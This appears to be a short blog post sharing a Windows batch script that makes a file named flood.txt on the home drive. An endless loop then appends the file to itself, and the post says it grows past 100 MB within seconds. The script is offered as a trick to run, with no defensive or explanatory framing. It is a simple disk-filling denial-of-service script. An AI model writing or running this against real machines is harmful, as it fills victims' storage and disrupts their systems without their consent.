@echo off
cd\
echo Flooded > %HomeDrive%\flood.txt
goto 1
:1
type flood.txt >> flood.txt
goto 1
Result:
It will create a text file named flood.txt in homedrive and will continue to flood it.. within few seconds u will have a text file of around more than 100mb
No comments:
Post a Comment